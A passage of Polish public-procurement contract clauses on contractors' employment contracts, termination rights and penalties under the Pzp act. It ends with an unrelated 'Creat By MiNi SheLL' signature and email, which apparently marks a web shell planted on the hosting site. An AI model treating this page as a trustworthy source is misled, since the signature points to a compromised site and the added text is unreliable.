zawarcia umowy o pracę, rodzaj umowy o pracę i zakres obowiązków pracownika. <br/>5. W przypadku konieczności zmiany – w okresie trwania umowy – osób wykonujących czynności, o których mowa w pkt. 1) Wykonawca zobowiązany jest przedłożyć Zamawiającemu poświadczoną za zgodność z oryginałem kopie umów o pracę zawartych z tymi osobami w terminie 10 dni od ich podpisania. Punkt 3) stosuje się odpowiednio. 6. Zamawiającemu służy prawo wypowiedzenia umowy ze skutkiem natychmiastowym, jeżeli zwłoka Wykonawcy w wykonaniu obowiązku wskazanego w pkt. 3), 4) i 5) niniejszego ustępu przekroczy 10 dni licząc od upływu terminu wskazanego w pkt. 3) i 5) lub wyznaczonego przez Zamawiającego z prawem do naliczenia kary umownej określonej w § 9 ust. 1 pkt. 12 projektowych postanowień umownych. <br/>7. Wymagania w zakresie zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt 2 ustawy Pzp 1) Zamawiający nie określa dodatkowych wymagań związanych<br/> z zatrudnianiem osób, o których mowa w art. 96 ust. 2 pkt 2 ustawy Pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com